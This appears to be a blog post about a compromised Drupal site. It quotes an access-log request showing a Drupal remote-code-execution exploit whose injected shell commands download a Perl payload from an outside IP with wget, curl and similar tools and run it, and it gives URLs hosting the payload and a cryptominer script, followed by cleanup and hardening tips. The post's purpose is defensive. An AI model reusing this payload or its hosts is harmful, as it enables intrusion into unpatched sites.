What is this article about?
I will talk about what happens when you do not update your Drupal website core and contributed modules.
What does this document cover?
- Why it is important to update your Drupal website?
- How do they get into your server?
- How to fix your hacked drupal site?
- How can I secure my server?
Why it is important to update your Drupal website?
Drupal is an open source project. Everyone can see it’s vulnerabilities. And I think the worst thing about it is that when a security update arrives, you have to update your site asap because the hackers will know what the vulnerability is covering even if they did not know about it. So, it’s a shout-out to the hackers and telling them, “look, if the site is not updated, this is how you hack it”.
How do they get into your server?
Most people who call themselves hackers are very very small and disgusting people. The way that they “hack” your site is so childish, you wouldn’t believe to what level they can drop themselves to. Here is one of the ways:
- Use a vulnerability: Check this request out that I found on an access log:
162.158.102.97 - - [15/May/2018:11:54:02 +0200] "POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=cd+/var/tmp/+;+cd+/tmp/+;+rm+-rf+maxx2.txt+;+wget+http://195.22.126.117/maxx2.txt+;+mv+maxx2.txt+wget.txt+;+perl+wget.txt+195.22.127.225+;+lwp-download+http://195.22.126.117/maxx2.txt+;+mv+maxx2.txt+lynx.txt+;+perl+lynx.txt+195.22.127.225+;+fetch+http://195.22.126.117/maxx2.txt+;+mv+maxx2.txt+fetch.txt+;+perl+fetch.txt+195.22.127.225+;+curl+-O+http://195.22.126.117/maxx2.txt+;+mv+maxx2.txt+curl.txt+;+perl+curl.txt+195.22.127.225+;+rm+-rf+maxx2.txt+wget.txt+lynx.txt+fetch.txt+curl.txt HTTP/1.1" 301 817 "-" "curl/7.35.0"
Look at that request. You need to have serious problems to get that level. Anyways, and this is what happens next:
They upload this code here http://195.22.126.117/maxx2.txt to your server. Then, by executing some commands they create a jpg file which is basically a script and in the end they create /var/tmp/refresh script. You can see the script here: http://206.189.151.79:8080/refresh
That script runs bitcoin miners in your server. I mean, is that even a thing? The chances to find a bitcoin block by a CPU miner for a year long on a tiny unix server is 1/70.000.000. I am telling you, whoever is doing this, is a teenager.
How to fix your hacked drupal site?
- First, update all the modules and the core.
- Check all the folders and files to see if there are any unwanted php files around.
- Search for index.php files under directories and remove them.
- Check your other php files to see if there are any injections.
- Search for *.ico files, if you see any _7yhT6j.ico file, remove them all.
git statusmight show you what files are effected. If you are sure there shouldn’t be any changes, simplygit reset --hard commit_idwill revert all the file changes back.
How can I secure my server?
- PHP is powerful and can manipulate on your server. First, limit it’s functionality, do everything mentioned here
- Change your ssh port number
- Do not connect to your server with the root user
- Make sure that you can only access to your server with a public key
- Block harmful IPs with iptables
- Close certain ports, only open the ones that you use
- Your web user should only have access to write under a certain folder